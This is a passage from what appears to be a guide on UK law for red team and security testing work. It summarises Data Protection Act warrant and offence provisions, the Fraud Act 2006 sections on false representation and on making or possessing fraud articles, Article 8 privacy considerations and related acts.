Comply with the principles for transfers of personal data to third countries, non-Convention countries and international organisations
In addition, a judge must also be satisfied that there are reasonable grounds to suspect that evidence of the failure or offence can be found on the premises, or could be viewed using equipment on the premises. This warrant will only be issued if various conditions are met:
At least seven days have passed since the Information Commissioner gave notice in writing demanding access to the premises in question.
Access was demanded at a reasonable hour, but access was unreasonably refused; or entry was granted by the occupier, but they unreasonably refused to allow the Information Commissioner to carry out the required searches and inspections.
The occupier of the premises was notified by the Information Commissioner that an application for the warrant had been made.
If the personal data is processed for the special purposes, then this activity is covered under Section 174.
Complaints & Avoidance
It is clearly an offence to delete information which may realistically be required to be retained by the Information Commissioner. The only defence is if the destruction/disposal would have occurred regardless of the notice being given; this is covered by Part 6, Section 148.
Part 6, Section 170 details the criminal offences relating to obtaining, disclosing or retaining personal data without the consent of the controller.
Section 173 provides that, where a subject access or data portability request has been received, it is an offence for a controller or related persons, including a processor, to take action to prevent the sharing of information which an individual would be entitled to receive. It is a defence if the action would have occurred regardless of the request or if the person charged acted in the reasonable belief that the individual was not entitled to receive the information.
Fraud Act 2006
The CPS guidance is really useful for this law! In many cases, fraud can be considered (or comprise) theft, so charges can potentially be levied under other existing laws relating to theft. A lot of the contents of this law relate to deception, so only specific parts relate to red teaming. The CPS also highlight that criminal prosecutions for fraud can be brought, but cases may be more appropriately handled via regulatory or civil proceedings.
For all cases of fraud, the below must be true, with the maximum sentence being 10 years.
The defendant’s conduct must be dishonest;
His/her intention must be to make a gain or cause a loss or the risk of a loss to another.
No gain or loss needs actually to have been made.
This highlights the crux of all potential fraud cases relating to cyber security testing (“his/her intention must be to make a gain; or cause a loss or the risk of a loss to another”). A well defined and scoped test will ensure that no loss/gain is obtained, with testing simply being performed to simulate such activity.
Section 2 – Fraud by false representation
The following must be true for someone to be culpable of a Section 2 offence:
Made a false representation
Dishonestly
Knowing that the representation was or might be untrue or misleading
With intent to make a gain for himself or another, to cause loss to another or to expose another to risk of loss.
Section 6 – Possession of articles for use in fraud
For a Section 6 offence, the defendant must have:
Had possession or control of;
An article;
For use in the course of or in connection with any fraud.
The wording draws on Section 25 of the Theft Act 1968. The proof required is that the defendant had the article for the purpose or with the intention that it be used in the course of or in connection with an offence.
The CPS gives specific guidance on those ‘involved in the development of computer software … to test the security of computer or security systems’. For these cases, the defence must rely on the lack of intention to commit fraud.
Section 7 – Making or supplying articles for use in frauds
A section 7 offence occurs when the defendant:
Makes, adapts, supplies or offers to supply any article;
For use in the course of or in connection with fraud;
Knowing that it is designed or adapted for use in the course of or in connection with fraud (Section 7(1)(a)); or
Intending it to be used to commit or assist in the commission of fraud (Section 7(1)(b)).
Again, the CPS make specific mention about cyber security testing:
A person who makes an article specifically for use in fraud, for example, a software programme to create a phishing website or send phishing email, may be ambivalent about whether the person to whom it is supplied actually uses it for fraud. He will fall foul of Section 7 (1) (a) but will not have the necessary intention for Section 7 (1) (b).
The manufacturer of articles that are capable of being used in or in connection with fraud but have other innocent uses will not fall foul of this section unless he intends that it should be used in a dishonest way (Section 7 (1) (b)).
Human Rights Act
There are 14 ‘articles’ in the Human Rights Act (with Articles 1 and 13 being fulfilled by human rights being enshrined in UK law). This is the UK’s implementation of the European Convention on Human Rights (ECHR).
For cyber security testing, Article 8 is the main item to consider (“Respect for your private and family life”). The key definition is of a ‘private life’, preventing the media and other individuals from interfering with your life. It also covers the secure, private storage of any PII relating to an individual.
This can have several impacts on red teaming, typically covered in a rules of engagement, for example ensuring that appropriate permissions are in place for:
Gathering of private messages/internal chats
Key logging
Monitoring of web traffic/activity
The underlying concepts tie into GDPR, focusing on data minimisation and proportionality of testing/data storage.
Related Acts
Investigatory Powers Act 2016
Whilst this is unlikely to occur during a red team exercise, the Investigatory Powers Act covers the unlawful interception of a public telecommunication system, a private telecommunication system, or a public postal service.
Misconduct in Public Office
This covers the common-law offence of misconduct in public office, for example where a police officer misuses the Police National Computer (PNC). Whilst this is again unlikely to occur during red team operations, it highlights the importance of detailed logging and deconfliction processes when performing identity-based attacks or leveraging legitimate accounts to access systems.